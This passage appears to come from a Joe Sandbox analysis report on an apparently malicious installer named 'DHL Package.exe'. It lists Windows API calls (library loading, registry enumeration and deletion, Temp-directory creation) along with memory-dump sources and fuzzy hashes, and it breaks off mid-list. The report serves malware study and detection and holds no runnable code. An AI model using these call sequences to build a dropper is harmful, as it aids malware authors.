                                                                                                • Instruction Fuzzy Hash: 99813671E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB291C7785986DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                                                • Instruction ID: 102eaf4500afa36507883bc49c2e43cf6988b9622fad8f3b05d2dee193d28093
                                                                                                • Opcode Fuzzy Hash: 482a787b1e93187f303b5cf3d5fad6fe7b39919471561c5747e88453b07a974d
                                                                                                • Instruction Fuzzy Hash: 59814631E04228DBEB24CFA8C8447ADBBB1FB45305F24816AD856BB2C1D7786986DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                                                • Instruction ID: a08c2ff1229a9d9811f570562685937cd52cd07e2c0e62d18be643d670bbfbbc
                                                                                                • Opcode Fuzzy Hash: 9f1c290fb996461610dc05284254ea561df87b77a02dec37c2f17ec044b843f5
                                                                                                • Instruction Fuzzy Hash: B2712471E04228CFDF24CFA8C894BADBBB1FB45305F14806AD846BB281D7386996DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                • Instruction ID: 79a44bce1fc769ef2bff189c36481e04bceb851a7a33cd9c662bfef797063258
                                                                                                • Opcode Fuzzy Hash: 94b25f7611fe17d8713c058a6f17e47c27a0001acd6cd4792c255928ec9836d2
                                                                                                • Instruction Fuzzy Hash: 16713571E04218CFDF28CFA8C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                                                • Instruction ID: e69ca442741bc9d68f02c0d51ce09155c0cc214200520a71f8620544c8c92ec3
                                                                                                • Opcode Fuzzy Hash: 0815afd74f654c503a0d6cbf149fd97df88f382804d918d52621f4cf167551eb
                                                                                                • Instruction Fuzzy Hash: 78713731E04229CFEF24CF98C854BADBBB1FB45305F14806AD856BB281C7786996DF45
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000,?), ref: 0040547B
                                                                                                  • Part of subcall function 00405443: lstrlenW.KERNEL32(00403385,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00000000,00418EC0,004031E6,?,?,?,?,?,?,?,?,?,00403385,00000000), ref: 0040548B
                                                                                                  • Part of subcall function 00405443: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,00403385), ref: 0040549E
                                                                                                  • Part of subcall function 00405443: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll), ref: 004054B0
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054D6
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054F0
                                                                                                  • Part of subcall function 00405443: SendMessageW.USER32(?,00001013,?,00000000), ref: 004054FE
                                                                                                • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 334405425-0
                                                                                                • Opcode ID: 3fdbe18e2112064b0b2a9084d64d0bdc259e22eb5b579a0d538470750448287f
                                                                                                • Instruction ID: cd994d89a020c92b9959873617b7f6e70dfe1d5d911cfc63d75f2132deb71e9d
                                                                                                • Opcode Fuzzy Hash: 3fdbe18e2112064b0b2a9084d64d0bdc259e22eb5b579a0d538470750448287f
                                                                                                • Instruction Fuzzy Hash: F9219931600114EBCF10AFA5CE4999E7A71AF54358F70413BF515B91E0C7BD8E829A2D
                                                                                                APIs
                                                                                                • GlobalFree.KERNEL32(00700108), ref: 00401C0B
                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFree
                                                                                                • String ID: Call
                                                                                                • API String ID: 3394109436-1824292864
                                                                                                • Opcode ID: 5f7d7e138f8698d98c0f764f3aa5b1f83c3d489703198481e529c8cc9450ae44
                                                                                                • Instruction ID: 8eac660807c21ed12e13958da8917723c714091cd548f80009266c163e09adae
                                                                                                • Opcode Fuzzy Hash: 5f7d7e138f8698d98c0f764f3aa5b1f83c3d489703198481e529c8cc9450ae44
                                                                                                • Instruction Fuzzy Hash: 88219673604114DBD720AF94DDC4A5E73B4AB14324725453BF952F72D1C6BCAC418BAD
                                                                                                APIs
                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025C9
                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025DC
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl98D6.tmp,00000000,00000011,00000002), ref: 004025F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Enum$CloseValue
                                                                                                • String ID:
                                                                                                • API String ID: 397863658-0
                                                                                                • Opcode ID: cdf38385d8dd9cced9e9ebce897e28bf756463deeb7990ccf4e149fd3565b48b
                                                                                                • Instruction ID: a7cbbd47cb86148b91354035d47534ffc2f0529ed350b09f7076557a4cc3562b
                                                                                                • Opcode Fuzzy Hash: cdf38385d8dd9cced9e9ebce897e28bf756463deeb7990ccf4e149fd3565b48b
                                                                                                • Instruction Fuzzy Hash: E5017C71A11504BBEB149FA49E48AAEB77CEF40348F10403AF501B61C0D7B85E40866D
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
                                                                                                • Instruction ID: 7386925216f0ba2205b30ed829fcd6135741b8aa1a9a6a78a8dcdd66e79b8f9a
                                                                                                • Opcode Fuzzy Hash: 63a2f56983bf68ef82dee2aa6a19202fa350abc755d43e3a7d8789ab9979b1a1
                                                                                                • Instruction Fuzzy Hash: 1001F431724220EBEB194B389D09B2A3698E710318F10867FF855F66F1E678CC169B5D
                                                                                                APIs
                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040244E
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteValue
                                                                                                • String ID:
                                                                                                • API String ID: 2831762973-0
                                                                                                • Opcode ID: 1398552c6e627ad05fb451d9c53705c000a79c99bd8c8c36d0fc21123b95c68d
                                                                                                • Instruction ID: 7bf3b9bda095295facd6d55e439189fe3d0c4b39bd7c4db64debc0172d77640d
                                                                                                • Opcode Fuzzy Hash: 1398552c6e627ad05fb451d9c53705c000a79c99bd8c8c36d0fc21123b95c68d
                                                                                                • Instruction Fuzzy Hash: 91F09632A00120ABDB10AFA89B4DAAE73B5AF44314F12443FF651B71D1DAFC5D01563E
                                                                                                APIs
                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$EnableShow
                                                                                                • String ID:
                                                                                                • API String ID: 1136574915-0
                                                                                                • Opcode ID: 160cf1c66850f4bed6f66cfa63f2570c3352e267f1b5ac0914f4f272acffcfde
                                                                                                • Instruction ID: 0770d74e77a1de07b8bd233185459685766243133281c20ed0e2d1775c5ce133
                                                                                                • Opcode Fuzzy Hash: 160cf1c66850f4bed6f66cfa63f2570c3352e267f1b5ac0914f4f272acffcfde
                                                                                                • Instruction Fuzzy Hash: 96E09A32A04200DFD704EFA4AE484AEB3B4FF90325B20097FE401F21D1CBB95C00862E
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: ShowWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1268545403-0
                                                                                                • Opcode ID: 8a3ace4d73dff19dd78a2f86c5dfd3cf6f912f39cd3c1c8a42cc0f40dfae91d8
                                                                                                • Instruction ID: 97b786059bb2d23d50747ff5f4ab461a12b6bf7948ca023dcdd123286d4674a9
                                                                                                • Opcode Fuzzy Hash: 8a3ace4d73dff19dd78a2f86c5dfd3cf6f912f39cd3c1c8a42cc0f40dfae91d8
                                                                                                • Instruction Fuzzy Hash: 13E04F36B10115ABCB14DFA8ED8086E73B6FB54310760487AE902B3290C675AC11CB68
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                  • Part of subcall function 00406760: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406777
                                                                                                  • Part of subcall function 00406760: wsprintfW.USER32 ref: 004067B2
                                                                                                  • Part of subcall function 00406760: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 2547128583-0
                                                                                                • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                • Instruction ID: 7df567e52fbdf149b69dac354ceafd4fa41e0472f673109ceae729e6c8d6a9a9
                                                                                                • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                • Instruction Fuzzy Hash: 26E0863390421096E211A7709F88C7773A8AF89644307483EF946F2080EB38DC31A679
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\DHL Package.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405ED5
                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405EF7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282310268.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_DHL Package.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403482,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036D9,?,00000007,00000009,0000000B), ref: 00405995
                                                                                                • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2281958207.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2281893809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282015285.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2282067046.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
